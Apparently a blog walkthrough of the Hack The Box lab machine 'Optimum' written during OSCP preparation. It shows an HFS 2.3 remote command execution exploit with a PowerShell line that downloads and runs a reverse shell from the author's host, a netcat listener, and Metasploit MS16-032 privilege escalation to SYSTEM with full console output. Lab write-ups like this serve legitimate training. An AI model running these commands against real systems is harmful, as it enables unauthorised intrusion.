Path to OSCP: Optimum

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Next up is Optimum. Nmap as always:

u01@nostromo:~$ sudo nmap -p- -A optimum.htb -oA HTB/optimum/optimum
[sudo] password for u01: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-02 14:43 EDT
Nmap scan report for optimum.htb (10.10.10.8)
Host is up (0.040s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (87%), Microsoft Windows Server 2012 R2 (87%), Microsoft Windows Server 2012 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 41.48 ms 10.10.14.1
2 41.54 ms optimum.htb (10.10.10.8)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.45 seconds

A Windows box, with just port 80 exposed, running HFS, HTTP File Server 2.3.

Searchsploit shows a potential RCE Python script for this version, exploiting CVE-2014-6287:

u01@nostromo:~$ searchsploit httpfileserver
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------

The script requires a reverse shell as payload. The example given in the script mentions mini-reverse.ps1, so I decide to keep things simple and find that on GitHub.

With the necessary IP and port modified, I fire off the Python script and we’re given a link to trigger the payload.

u01@nostromo:~/HTB/optimum$ python3 49125.py optimum.htb 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:8888/mini-reverse.ps1')"

With a netcat listener open we click the link and we get a shell as user optimum\kostas:

u01@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.8] 49167
> whoami
optimum\kostas

We grab the user.txt flag from this directory and begin some manual enumeration.

The shell is pretty flakey and difficult to use, with systeminfo giving a pretty nasty output. Still, it’s enough to grab the OS build (Microsoft Windows Server 2012 R2 Standard 6.3.9600 Build 9600 exploit) and lead us to Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) – Local Privilege Escalation (MS16-032) (PowerShell) – Windows local Exploit (exploit-db.com).

I upload the PowerShell script in the same manner as before with certutil, but can’t get the exploit to work. I suspect it may be something to do with the foothold shell I have.

So, not wanting to waste too much time here, I revert to Metasploit, which has a module for MS16-032:

msf6 > search ms16_032

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation

We first need to establish a session for this module, so we circle around and re-exploit from MSF the same vulnerability in HFS:

msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.14.12:4444 
[*] Using URL: http://10.10.14.12:8080/qCpgrJgE
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /qCpgrJgE
[*] Sending stage (175686 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\zHFtmjdvIWPx.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.14.12:4444 -> 10.10.10.8:49270) at 2023-09-02 15:52:20 -0400
[*] Server stopped.

meterpreter > 
Background session 1? [y/N]

Plugging the session ID into the ms16_032 module, we run the exploit and gain SYSTEM to retrieve root.txt flag:

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.14.12:4444 
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\nQzEgbj.ps1...
[*] Compressing script contents...
[+] Compressed size: 3768
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___ 
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|

[by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1716

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+ $oc = [Ntdll]::NtImpersonateThread($d87Xk, $d87Xk, [ref]$gxhzy)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (gxhzy:VariablePath) [], Runti 
meException
+ FullyQualifiedErrorId : NonExistingVariableReference

[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+ $oc = [Advapi32]::DuplicateToken($jWvl, 2, [ref]$u3Ws)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument

[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

JBDPVCnqxwZX6u1KPztfm6WuZQGfdmCr
[+] Executed on target machine.
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.12:4444 -> 10.10.10.8:49271) at 2023-09-02 15:54:36 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\nQzEgbj.ps1

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

A little disappointed I couldn’t root this without using Metasploit, I definitely need to work on my Windows-based reverse shell commands, but best to keep moving on at this stage.

Leave a Reply

Your email address will not be published. Required fields are marked *